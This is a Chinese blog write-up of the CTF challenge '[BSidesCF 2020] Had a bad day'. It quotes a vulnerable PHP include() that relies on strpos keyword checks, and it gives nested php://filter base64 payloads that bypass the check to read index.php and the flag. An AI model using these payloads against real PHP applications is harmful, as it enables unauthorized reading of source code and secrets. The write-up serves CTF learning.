[BSidesCF 2020]Had a bad day1

最新推荐文章于 2024-02-12 23:13:49 发布

Y0n3er

最新推荐文章于 2024-02-12 23:13:49 发布

阅读量473

点赞数

文章标签：伪协议 Base64编码 PHP过滤嵌套攻击资源文件访问

本文链接：https://blog.csdn.net/qq_63169208/article/details/125468559

版权

知识点：伪协议的嵌套

点一下是两张图片，但是这里要注意你点图片时URL会传入变量

尝试了一下模板注入发现不是，然后直接构造一句话木马发现也不行，但是当你在打开图片在传入的变量后面随便加上一个字母会发现自动加上了php

尝试用伪协议打开一下index.php，但是php不用加因为会自动加

base64解密一下，拿到php代码

<?php
    $file = $_GET['category'];

	if(isset($file))
	  {
	    if( strpos( $file, "woofers" ) !==  false ||
                strpos( $file, "meowers" ) !==  false || 
                strpos( $file, "index"))
                {
		include ($file . '.php');
	        }
	    else{
		echo "Sorry, we currently only support woofers and meowers.";
		}
	 }
?>

可以看到变量中必须包含三个的其中一个，这时候就需要利用伪协议的嵌套了

payload：/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag

或者加到前面

/index.php?category=php://filter/read=index/convert.base64-encode/resource=flag

解码拿到

Y0n3er

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[BSidesCF 2020]Had a bad day1

知识点：伪协议的嵌套点一下是两张图片，但是这里要注意你点图片时URL会传入变量尝试了一下模板注入发现不是，然后直接构造一句话木马发现也不行，但是当你在打开图片在传入的变量后面随便加上一个字母会发现自动加上了php尝试用伪协议打开一下index.php，但是php不用加因为会自动加base64解密一下，拿到php代码可以看到变量中必须包含三个的其中一个，这时候就需要利用伪协议的嵌套了payload：/index.php?category=php://filter/read=convert.base64-
复制链接

扫一扫